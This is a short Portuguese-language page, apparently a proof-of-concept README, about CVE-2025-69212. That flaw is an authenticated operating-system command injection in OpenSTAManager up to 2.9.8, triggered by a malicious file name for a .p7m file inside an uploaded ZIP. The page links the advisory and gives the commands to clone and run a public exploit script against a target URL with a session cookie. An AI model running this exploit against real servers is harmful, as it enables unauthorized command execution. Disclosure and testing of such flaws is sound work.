
https://github.com/advisories/GHSA-25fp-8w8p-mx36
O OpenSTAManager (versões <= 2.9.8) possui uma vulnerabilidade crítica de injeção de comandos do sistema operacional na funcionalidade de decodificação de arquivos P7M (XML assinado). Um atacante autenticado pode carregar um arquivo ZIP contendo um arquivo .p7m com um nome de arquivo malicioso para executar comandos arbitrários do sistema no servidor.
git clone https://github.com/xorandd/CVE-2025-69212-PoC
cd CVE-2025-69212-PoC
python3 CVE-2025-69212.py -u http://target.com -C <PHPSESSID_cookie>
CVE-2025-69212.py [-h] -u URL -C COOKIE
options:
-h, --help show this help message and exit
-u, --url URL target url, eg http://127.0.0.1
-C, --cookie COOKIE cookie value